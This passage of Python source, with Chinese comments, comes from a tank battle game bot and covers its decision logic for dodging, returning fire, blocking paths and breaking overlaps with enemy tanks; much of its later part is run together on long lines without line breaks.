                        # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f
                        #
                        if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3)
                            and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待
                            and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来
                            and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人
                            and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局
                            ):
                            # 判断是否为反复回头
                            if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过
                                player.add_labels(Label.ALWAYS_BACK_AWAY)

                            if (player.has_label(Label.ALWAYS_BACK_AWAY)
                                and not battler.is_in_our_site(include_midline=True) # 严格不在我方基地
                                ):
                                # 考虑用闪避的方式代替后退
                                for action in battler.try_dodge(oppBattler):
                                    realAction = player.try_make_decision(action)
                                    if Action.is_move(realAction):
                                        player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY)
                                        player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态
                                        return realAction

                            # 否则继续回头
                            backMoveAction = battler.back_away_from(oppBattler)
                            action = player.try_make_decision(backMoveAction)
                            if Action.is_move(action):
                                player.set_status(Status.READY_TO_BACK_AWAY)
                                return action

                        if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射
                            and not battler.canShoot    # 但是我方本回合不能射击
                            and not oppBattler.canShoot # 并且对方本回合不能射击
                            ):
                            player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持

                        # 其余情况照常
                        player.set_status(Status.PREVENT_BEING_KILLED)
                        return realAction

                    # 否则不予理会,直接移动或者反击
                    action = player.try_make_decision(battler.get_next_attacking_action())
                    if not Action.is_stay(action):
                        # 补丁
                        #----------------------------
                        # 针对两者距离为 2 的情况,不能一概而论!
                        #
                        if status == Status.STALEMENT: # 僵持模式考虑堵路
                            _route = battler.get_route_to_enemy_by_move(oppBattler)
                            if _route.is_not_found():
                                _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)
                            assert not _route.is_not_found(), "route not found ?" # 必定能找到路!
                            assert _route.length > 0, "unexpected overlapping enemy"
                            if _route.length == 2:
                                if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路
                                    player.set_status(Status.READY_TO_BLOCK_ROAD)
                                    return Action.STAY
                        # 其他情况均可以正常移动
                        #player.set_status(Status.KEEP_ON_MARCHING)
                        #return action
                        return # 直接抛出让后面的 decision 处理,当做没有这个敌人

                    # 不能移动,只好反击
                    action = player.try_make_decision(battler.shoot_to(oppBattler))
                    if Action.is_shoot(action):
                        player.set_status(Status.READY_TO_FIGHT_BACK)
                        return action

                else:
                    # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1
                    #-----------------------------
                    # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击
                    # 2. 如果是僵持的,那么优先堵路,类似于 Defensive
                    #
                    # TODO:
                    #   可能需要团队信号协调 5ccc30f7a51e681f0e8c1668
                    #
                    if status == Status.STALEMENT:
                        #
                        # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive
                        #
                        # TODO:
                        #   有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59
                        #   上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人
                        #   这种情况下直接转为侵略模式!
                        #
                        if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1)
                            and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1)
                                or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1))
                            ):
                            pass # 直接过到侵略模式
                        else: # 否则算作正常的防守
                            #
                            # TODO:
                            #   射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走!
                            #   5ce4e66cd2337e01c7a6abd7
                            #
                            if battler.canShoot:
                                #
                                # (inserted) 先看上回合是不是刚被对方过掉
                                #
                                _justBreakOverlap = False
                                with map_.rollback_to_previous():
                                    if (battler.has_overlapping_enemy()
                                        and oppTank is battler.get_overlapping_enemy()
                                        ): # 刚刚被对手打破重叠
                                        _justBreakOverlap = True

                                _shouldShoot = False
                                if _justBreakOverlap: # 刚刚被对手主动打破重叠
                                    for _route in battler.get_all_shortest_attacking_routes():
                                        if oppTank.xy in _route: # 对方现在位于我的攻击路线上,说明对方上回合是
                                            _shouldShoot = True  # 回头堵路,那么继续保持射击
                                            break

                                if _shouldShoot: # 正常防御
                                    player.set_status(Status.READY_TO_BLOCK_ROAD, Status.READY_TO_FIGHT_BACK)
                                    if battler.on_the_same_line_with(oppBattler, ignore_brick=False):
                                        player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射
                                    return battler.shoot_to(oppBattler)
                                else:
                                    pass # 否则视为进攻逻辑

                    # 闪避,尝试找最佳方案
                    #-------------------------
                    defenseAction = Action.STAY
                    if battler.canShoot:
                        defenseAction = battler.shoot_to(oppBattler)
                    dodgeActions = battler.try_dodge(oppTank)

                    if battler.is_in_enemy_site(): # 限制条件,只有在对方基地才开始闪现!
                        #
                        # 最佳方向是闪避向着进攻方向移动
                        #
                        attackAction = battler.get_next_attacking_action()
                        for action in dodgeActions: # 与进攻方向相同的方向是最好的
                            if Action.is_same_direction(action, attackAction):
                                realAction = player.try_make_decision(action) # 风险评估
                                if Action.is_move(realAction):
                                    player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)
                                    return realAction # 闪避加行军

                        # 没有最佳的闪避方案,仍然尝试闪避
                        #-----------------------------
                        # 但是不能向着增加攻击线路长短的方向闪避!
                        #
                        route1 = battler.get_shortest_attacking_route()
                        for action in dodgeActions:
                            realAction = player.try_make_decision(action)
                            if Action.is_move(realAction):
                                with map_.simulate_one_action(battler, action):
                                    route2 = battler.get_shortest_attacking_route()
                                    if route2.length > route1.length: # 不能超过当前路线长度,否则就是浪费一回合
                                        continue
                                    else:
                                        player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)
                                        return realAction

                    #
                    # 此时还可以考虑借力
                    # 假设下回合两方对射,如果我方尝试闪避,对方会恰好打掉我方进攻路线上的块,那么就闪避
                    #
                    if (len(dodgeActions) > 0 # 存在可用的闪避行为
                        and battler.is_in_enemy_site() # 限制为只有在对方基地才适用这个逻辑
                        ):
                        _shouldDodge = False
                        action = dodgeActions[0]
                        enemyShootAction = oppBattler.shoot_to(battler)
                        with outer_label() as OUTER_BREAK:
                            with map_.simulate_one_action(battler, action): # 假设闪走
                                fields = oppBattler.get_destroyed_fields_if_shoot(enemyShootAction)
                                for field in fields:
                                    if isinstance(field, BrickField): # 对手会打掉墙
                                        for _route in battler.get_all_shortest_attacking_routes():
                                            if field.xy in _route: # 这个块在某一个最短的攻击路线上
                                                _shouldDodge = True
                                                raise OUTER_BREAK
                        if _shouldDodge:
                            for action in dodgeActions:
                                realAction = player.try_make_decision(action)
                                if Action.is_move(realAction):
                                    player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)
                                    return realAction

                    #
                    # 没有不能不导致路线变长的办法,如果有炮弹,那么优先射击!
                    # 5ccef443a51e681f0e8e64d8
                    #-----------------------------------
                    route1 = battler.get_shortest_attacking_route()
                    if Action.is_shoot(defenseAction):
                        player.set_status(Status.READY_TO_FIGHT_BACK)
                        if battler.on_the_same_line_with(oppBattler, ignore_brick=False):
                            # (inserted) 刚刚对射为两回合,该回合尝试闪避敌人,打破僵局
                            #--------------------------------------------
                            # 尝试往远处闪避,创造机会
                            #
                            # 此外,由于敌人这回合必定射击,那么他的炮弹可能会打掉我身后的墙
                            # 这样的可能会创造一些新的机会。有的时候导致该回合必须要与敌人对射的原因,可能是因为
                            # 没有办法开辟攻击路线,而不是敌人堵路。由于闪避的方向是不允许的,也就是另一个更近的
                            # 闪避反向上必定是一个无法摧毁也不能移动到的块,否则会被与先摧毁。
                            # 此时如果可以往背离敌人的方向移动,那么应该不会陷入对射僵局。但事实上是进入了
                            # 这就说明别离敌人的方向是无法移动到的。如果它恰好是一块土墙,那么就可以靠这回合和敌人接力
                            # 来摧毁掉,也许还有往下移动的可能。 5ce429fad2337e01c7a5cd61
                            #
                            if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=4)
                                and Action.is_stay(player.get_previous_action(back=1)) # 检查对应的两个冷却回合是停止
                                and Action.is_stay(player.get_previous_action(back=3)) # 避免将移动对射的情况被考虑进来
                                and Action.is_stay(oppPlayer.get_previous_action(back=1))
                                and Action.is_stay(oppPlayer.get_previous_action(back=3))
                                and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人
                                and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局
                                ):
                                for action in battler.try_dodge(oppBattler):
                                    if Action.is_move(action):
                                        realAction = player.try_make_decision(action)
                                        if Action.is_move(realAction):
                                            player.set_status(Status.READY_TO_DODGE)
                                            # 这里还是再判断一下距离
                                            route1 = battler.get_shortest_attacking_route()
                                            with map_.simulate_one_action(battler, action):
                                                route2 = battler.get_shortest_attacking_route()
                                                if route2.length > route1.length:
                                                    player.set_status(Status.WILL_DODGE_TO_LONG_WAY)
                                            return realAction

                            # 默认是优先射击
                            player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY)
                        return defenseAction

                    # 如果不能射击,那么终究还是要闪避的
                    # 或者是无法后方移动,为了打破僵局,尝试闪避
                    #----------------------------------
                    for action in dodgeActions:
                        realAction = player.try_make_decision(action)
                        if Action.is_move(realAction):
                            player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)
                            #
                            # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb
                            # 为了后续能够打破这种情况,这里额外添加一个状态进行标记
                            #
                            player.set_status(Status.WILL_DODGE_TO_LONG_WAY)
                            return realAction

                    if Action.is_stay(defenseAction):
                        #
                        # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4
                        #
                        riskyEnemyBattler = player.get_risky_enemy()
                        if (riskyEnemyBattler is not None
                            and riskyEnemyBattler is not oppBattler
                            and riskyEnemyBattler.xy == battler.xy
                            ): # 这种情况下实际是没有威胁的 ...
                            for action in dodgeActions:
                                player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)
                                # TODO:
                                #   还需要判断是否向远路闪避 ...
                                #   这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去
                                return action

                    player.set_status(Status.DYING) # 否则就凉了 ...
                    return defenseAction

                return Action.STAY

            # 防御模式
            #----------
            # 1. 如果对方下回合必死,那么射击
            # 2. 优先堵路,距离远则尝试逼近
            # 3. 必要的时候对抗
            # 4. 距离远仍然优先
            #
            # elif status == DEFENSIVE_STATUS:
            # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为
            elif status == Status.DEFENSIVE:
                if not oppBattler.canShoot:
                    if len( oppBattler.try_dodge(battler) ) == 0:
                        if battler.canShoot: # 必死情况
                            player.set_status(Status.READY_TO_KILL_ENEMY)
                            return battler.shoot_to(oppBattler)
                    #
                    # 不能马上打死,敌人又无法攻击
                    #-------------------------------
                    # 优先堵路,根据双方距离判断
                    #
                    _route = battler.get_route_to_enemy_by_move(oppBattler)
                    if _route.is_not_found():
                        _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)
                    assert not _route.is_not_found(), "route not found ?" # 必定能找到路!
                    assert _route.length > 0, "unexpected overlapping enemy"

                    if _route.length == 1: # 双方相邻,选择等待
                        # 此处首先延续一下对射状态
                        if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射
                            and not battler.canShoot    # 但是我方本回合不能射击
                            and not oppBattler.canShoot # 并且对方本回合不能射击
                            ):
                            player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持
                        player.set_status(Status.READY_TO_BLOCK_ROAD)
                        return Action.STAY
                    elif _route.length > 2: # 和对方相隔两个格子以上
                        if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近
                            action = battler.move_to(oppBattler)
                            player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ...
                            return action
                        else:
                            player.set_status(Status.READY_TO_BLOCK_ROAD)
                            return Action.STAY # 否则只好等额爱
                    else: # _route.length == 2:
                        # 相距一个格子,可以前进也可以等待,均有风险
                        #----------------------------------------
                        # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我
                        #    - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠
                        #    - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了
                        # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠
                        #    - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近
                        #    - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间
                        #
                        # TODO:
                        #    好吧,这里的想法似乎都不是很好 ...
                        #    能不防御就不防御,真理 ...
                        #
                        """if len( oppBattler.try_dodge(battler) ) == 0:
                            # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我
                            action = oppBattler.move_to(battler) # 对方移向我
                            if map_.is_valid_move_action(oppBattler, action):
                                map_.simulate_one_action(oppBattler, action) # 提交模拟
                                if len( oppBattler.try_dodge(battler) ) == 0:
                                    # 下回合仍然不可以闪避,说明可以堵路
                                    map_.revert()
                                    player.set_status(Status.READY_TO_BLOCK_ROAD)
                                    return Action.STAY
                                map_.revert()
                            # 否则直接冲上去
                            if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动
                                moveAction = battler.move_to(oppBattler)
                                player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路
                                return moveAction
                            else: # 冲上去不安全,那就只能等到了
                                player.set_status(Status.READY_TO_BLOCK_ROAD)
                                return Action.STAY
                        else:
                            # 对手当前回合可以闪避,那么尝试冲上去和他重叠
                            # TODO:
                            #   可能弄巧成拙 5cca97a4a51e681f0e8ad227
                            #
                            #   这个问题需要再根据情况具体判断!
                            #
                            ''' if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠
                                moveAction = battler.move_to(oppBattler)
                                player.set_status(Status.READY_TO_BLOCK_ROAD)
                                return moveAction
                            else: # 有风险,考虑等待
                                player.set_status(Status.READY_TO_BLOCK_ROAD)
                                return Action.STAY
                            '''
                            #
                            # TODO:
                            #   是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通?
                            #
                            #   假设自己为钢墙然后搜索对方路径?
                            #
                            player.set_status(Status.READY_TO_BLOCK_ROAD)
                            return Action.STAY"""
                        player.set_status(Status.READY_TO_BLOCK_ROAD)
                        return Action.STAY # 似乎没有比这个这个更好的策略 ...
# 对方可以射击 else: if battler.canShoot: # 优先反击 player.set_status(Status.READY_TO_FIGHT_BACK) if battler.on_the_same_line_with(oppBattler, ignore_brick=False): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态 return battler.shoot_to(oppBattler) # 不能反击,只好闪避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: player.set_status(Status.DYING) # 凉了 ... action = Action.STAY elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: # len(actions) == 2: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 否则就凉了 ... player.set_status(Status.DYING) return Action.STAY # # 回撤模式 #------------ # 1. 优先回撤 # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路 # elif status == Status.WITHDRAW: base = map_.bases[battler.side] if not battler.is_closest_to(base): with player.create_snapshot(): decision = WithdrawalDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 withdraw 处理 else: # 现在我方坦克已经处在基地附近 with player.create_snapshot(): decision = BaseDefenseDecision(player, signal) action = decision.make_decision() if decision.is_handled(action): # 符合 base defense 的条件 with map_.simulate_one_action(battler, action): if oppTank not in battler.get_enemies_around(): # 安全行为 return # 留给 base defense # # 否则就是不安全行为,应该予以反击 # if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) elif oppBattler.canShoot: # 否则应该闪避 for action in battler.try_dodge(oppBattler): player.set_status(Status.READY_TO_DODGE) return action if oppBattler.canShoot: player.set_status(Status.DYING) # 不然就凉了 ... 
# 最后就等待 return Action.STAY #{ END 'decision/single/encount_enemy.py' }# #{ BEGIN 'decision/single/overlapping.py' }# class OverlappingDecision(SingleDecisionMaker): """ 与敌人重合时的决策 ------------------------ 侵略模式 -------- 1. 直奔对方基地,有机会就甩掉敌人 防御模式 -------- 1. 尝试回退堵路 2. 对于有标记的敌人,考虑采用其他的策略,例如尝试击杀敌军 多回合僵持后,会有主动打破重叠的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if battler.has_overlapping_enemy(): player.set_status(Status.ENCOUNT_ENEMY) player.set_status(Status.OVERLAP_WITH_ENEMY) oppTank = battler.get_overlapping_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.DEFENSIVE # 看作是防御 # # 先检查对方上回合是否在跟随我移动,以及时切换决策模式 ... # 5cd3f56d86d50d05a0083621 / 5ccec5a6a51e681f0e8e46c2 / 5ce26520d2337e01c7a3ca2b #------------------------------- if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and Action.is_move(player.get_previous_action(back=1)) ): oppPlayer.add_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=3) and all( Action.is_stay(player.get_previous_action(_back)) for _back in range(1, 3+1) ) ): # 如果和一个带有跟随重叠标记的敌人僵持超过 3 回合,就把这个标记移除,因为它此时已经不是一个会和我马上打破重叠的敌人了 oppPlayer.remove_labels(Label.BREAK_OVERLAP_SIMULTANEOUSLY) # 5ce3c990d2337e01c7a54b4c if (oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY) and Action.is_shoot(player.get_previous_action(back=1)) and Action.is_shoot(oppPlayer.get_previous_action(back=1)) # TODO: 是否有必要判断射击方向相同? 
): # 如果和一个带有跟随重叠标记的敌人在同一回合采用射击的方式打破重叠,则对这个行为进一步标记 oppPlayer.add_labels(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) # # (inserted) 如果敌人带有立即打破重叠的标记,那么如果还能执行到这个地方,就意味着敌人 # 上次打破重叠的方向是回防(如果是进攻,那么应该不会再有机会遭遇) # # 那么在此处重新进入重叠的时候,尝试将对手击杀 # if not status == Status.DEFENSIVE: # 防御模式不触发? if (oppPlayer.has_label(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY) # 上回合不重叠 ): action = battler.get_next_attacking_action() if Action.is_move(action): if battler.canShoot: player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) return action + 4 # # (inserted) 观察到大多数人在遇到重叠时会选择直接无视对手,我们也可以学习一下这种决策 # 但是目前不想让这个决策成为必须,希望它只在特定的状况下被触发。 # # 对于非防御模式下,考虑这样三种情况: # ------------------------------------- # 1. 假设我方当前进攻路线距离领先一步 ,如果对方主动打破重叠,这时,如果对方下一步可以闪避, # 而我方当前回合不饿能闪避,必须要还击(之所以必须要射击是因为我们考虑最坏的情况,假设 # 对方这回合会还击,如果我方这时候不还击就会被打掉),假如对方这回合闪避了,并且恰好沿着进攻 # 方向闪避,那么结束后对方将比我方领先一步,这时候即使再继续攻击,结局也很可能是输, # 因此这步可以考虑主动打破重叠 # # 2. 假设我方当前进攻路线长度与敌方相同,假设对方主动打破重叠,假设对方可以闪避并且可以向着 # 进攻方向闪避,那么对方很有可能比我方快一步,此时应该主动打破重叠。假如对方不能向着进攻方向 # 闪避,那么认为敌人一定会还击,此时考虑我方下回合是否可以向着进攻方向闪避,如果不可以的话, # 我方就和对方差一步,处于劣势,那么就主动打破重叠。 # # 3. 假设对方比我方领先一步,这种情况下多属于对方处在我方阵营,我方很可能会触发防御模式 # 这种情况下就直接忽略掉吧 # route1 = battler.get_shortest_attacking_route() route2 = oppBattler.get_shortest_attacking_route() _shouldActiveBreakOverlap = False _enemyAttackAction = Action.STAY if route1.is_not_found() or route2.is_not_found(): # 虽然应该不可能,但是还是判断一下 pass else: _leadingLength = route2.length - route1.length # 我方领先步数 debug_print(battler, _leadingLength) action = battler.get_next_attacking_action(route1) if Action.is_shoot(action): # TODO: # 是否有必要考虑射击行为? 
pass elif _leadingLength == 1: # 情况一 allRoutes = oppBattler.get_all_shortest_attacking_routes() # # 由于不同的路线下一步可能会走到相同的地方,而造成的结果相同 # 因此此处将相同的行为进行缓存,为了减少判断次数 _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # 只考虑移动行为,因为,假如对方当前回合射击,那么我方下回合可以移动 # 这时双方距离可以认为相等,很有可能平局 continue # 提交地图模拟这步行为,这个时候双方应该均为僵持 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合我方是否可以闪避 with player.create_snapshot(): # 确保这种情况下决策不会再运行到这里,因为此时将不再和敌人重叠,于是不会遇到递归无终点 action, _ = player.make_decision(signal=signal) if action != battler.shoot_to(oppBattler): # 说明下回合我方可以闪避,那么就可以不管了 continue # 我方下回合不可以闪避,考虑敌人下回合是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 说明下回合敌人可以闪避 _shouldActiveBreakOverlap = True break elif _leadingLength == 0: # 情况二 allRoutes = oppBattler.get_all_shortest_attacking_routes() _consideredActions = set() for route in allRoutes: _enemyAttackAction = oppBattler.get_next_attacking_action(route) if _enemyAttackAction in _consideredActions: continue _consideredActions.add(_enemyAttackAction) if not Action.is_move(_enemyAttackAction): # TODO: # 仍然不考虑射击?为了防止无迭代终点? 
continue # 提交一步模拟,敌方应该比我方领先一步 with map_.simulate_one_action(oppBattler, _enemyAttackAction): # 考虑下回合敌方是否可以闪避 with oppPlayer.create_snapshot(): action, _ = oppPlayer.make_decision() if action != oppBattler.shoot_to(battler): # 敌方可以闪避 _shouldActiveBreakOverlap = True break # 对方下回合不可以闪避,那么考虑我方是否可以闪避 with player.create_snapshot(): action, _ = player.make_decision() # TODO: # 我方下回合可能是防御状态,这种情况下必定反击,判断不准确 # # 不过问题其实不大,因为这样就会触发主动打破重叠 # if action == battler.shoot_to(oppBattler): # 我方不能闪避 _shouldActiveBreakOverlap = True break else: # 其他情况,留作下一回合打破重叠 pass if _shouldActiveBreakOverlap: action = battler.get_next_attacking_action(route1) if Action.is_move(action): if player.is_safe_to_break_overlap_by_move(action, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return action elif Action.is_shoot(action): # # 假设下一步射击,考虑最糟糕的一种情况,那就是敌人同一回合主动打破重叠,移动到我方身后 # 而我方无法闪避,那么就有被敌人击杀的风险 # _mayBeKilled = False with map_.simulate_one_action(oppBattler, _enemyAttackAction): with map_.simulate_one_action(battler, action): if len(battler.try_dodge(oppBattler)) == 0: # 无法闪避! _mayBeKilled = True if not _mayBeKilled: # 在没有被击杀风险的情况下可以采用射击 return action # 是否已经有多回合僵持,应该主动打破重叠 _shouldBreakOverlap = ( battler.canShoot # 可以射击 and player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) ) # 上回合重叠这回合还重叠,就视为僵持,趁早打破重叠 if status == Status.AGGRESSIVE: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # 尝试继续行军 action = battler.get_next_attacking_action() if Action.is_move(action): if _shouldBreakOverlap: # # 首先先处理主动打破重叠的情况的情况 # 该情况下会改用定制的安全性测试函数判断情况 # # TODO: # 优先尝试不往上回合已经移动过的方向移动 5ce26520d2337e01c7a3ca2b # realAction = action # # 如果遇到和我打破重叠时机一致的对手 #------------------- # 1. 尝试换一个方向移动 # 2. 如果不能换方向,那么可能在狭道内,那么退回原来的位置, # 这意味着如果敌人下回合开炮,那么他必死 5ce264c2d2337e01c7a3c9f6 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): # # 禁止的行为不一定是反向!因为可能恰好遇到拐弯 ... 
# 5ce48707d2337e01c7a641b7 / 5ce487a6d2337e01c7a64205 # _backTurn = 0 previousAction = Action.STAY while Action.is_stay(previousAction): # 有可能上回合是等待,也就是 _backTurn += 1 # 上回合又下方决策得到,因此需要一直回查到移动行为 previousAction = player.get_previous_action(back=_backTurn) forbiddenAction = action revertMoveAction = (previousAction + 2) % 4 # 反向移动的行为 # # 尝试移向其他的方向 # # TODO: # 太难判断了,还是暂时先禁止把 ... 鬼知道对面怎么算的距离 # '''if realAction == forbiddenAction: route1 = battler.get_shortest_attacking_route() for optionalAction in battler.get_all_valid_move_actions(): if (optionalAction == forbiddenAction or optionalAction == revertMoveAction # 不要回头 ): continue with map_.simulate_one_action(battler, optionalAction): route2 = battler.get_shortest_attacking_route() if route2.length <= route1.length: # 移动后不增加攻击距离s realAction = optionalAction break''' # # 尝试反向移动 # # TODO: # 事实上反向移动也不一定是正确的,因为每一个人对于这种情况的判断是不一样的 # 5ce4943ed2337e01c7a64cdd # '''if realAction == forbiddenAction: with map_.simulate_one_action(battler, revertMoveAction): if len(oppBattler.try_dodge(battler)) == 0: # 如果这回合他反向射击,那么必死 realAction = revertMoveAction''' # # 否则等待,让敌人开一炮,这样下回合还会继续触发移动 # 有可能换一个敌方就可以有别的决策方法 # 也有可能直接带到基地 5ce48b77d2337e01c7a644e5 # if realAction == forbiddenAction: player.set_status(Status.OVERLAP_WITH_ENEMY) # 保持等待状况 return Action.STAY if player.is_safe_to_break_overlap_by_move(realAction, oppBattler): player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 无法安全移动,但是又需要打破重叠,那么就视为防御 # 让后续的代码进行处理 player.remove_status(Status.AGGRESSIVE) player.set_status(Status.DEFENSIVE) pass # 这里会漏到 DEFENSIVE else: # 开始处理常规情况 realAction = player.try_make_decision(action) if Action.is_move(realAction): # 继续起那就 player.set_status(Status.KEEP_ON_MARCHING) return realAction # 否则就是等待了,打得更有侵略性一点,可以尝试向同方向开炮! 
realAction = player.try_make_decision(action + 4) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction elif Action.is_shoot(action): # 下一步预计射击 realAction = player.try_make_decision(action) if Action.is_shoot(realAction): player.set_status(Status.KEEP_ON_MARCHING) return realAction else: # 否则停留 player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY # 原地等待 if status == Status.DEFENSIVE or _shouldBreakOverlap: # 对方不能射击,对自己没有风险,或者是符合了主动打破重叠的条件 if not oppBattler.canShoot or _shouldBreakOverlap: # # 这里不只思考默认的最优路径,而是将所有可能的最优路径都列举出来 # 因为默认的最优路径有可能是破墙,在这种情况下我方坦克就不会打破重叠 # 这就有可能错失防御机会 # for enemyAttackRoute in oppBattler.get_all_shortest_attacking_routes(): oppAction = oppBattler.get_next_attacking_action(enemyAttackRoute) # 模拟对方的侵略性算法 if Action.is_move(oppAction) or Action.is_shoot(oppAction): # 大概率是移动 # 主要是为了确定方向 oppAction %= 4 # 首先先检查对方是否会跟随我 #-------------------------- # 1. 如果我方可以射击,对方不能射击,那么按照之前的经验,对方下回合会移动 # 这个时候尝试击杀 # if oppPlayer.has_label(Label.BREAK_OVERLAP_SIMULTANEOUSLY): if battler.canShoot: # 这回合可以射击,则改为射击 if (oppPlayer.has_label(Label.SIMULTANEOUSLY_SHOOT_TO_BREAK_OVERLAP) and oppBattler.canShoot # 如果带有这个标记,那么这回合就不要射击了,等待敌人打完这回合, ): # 下回合才有可能击杀 5ce50cd9d2337e01c7a6e45a player.set_status(Status.KEEP_ON_OVERLAPPING) return Action.STAY else: # 否则就考虑反身射击 player.set_status(Status.READY_TO_BREAK_OVERLAP, Status.ATTEMPT_TO_KILL_ENEMY) # 尝试击杀敌军 return oppAction + 4 else: pass # 均不能射击,那么将判定为没有风险。那就一起移动 # 正常情况下选择堵路 #---------------------- if player.is_safe_to_break_overlap_by_move(oppAction, oppBattler): # 模仿敌人的移动方向 player.set_status(Status.READY_TO_BREAK_OVERLAP) player.set_status(Status.READY_TO_BLOCK_ROAD) # 认为在堵路 return oppAction # 否则等待 player.set_status(Status.READY_TO_BLOCK_ROAD) 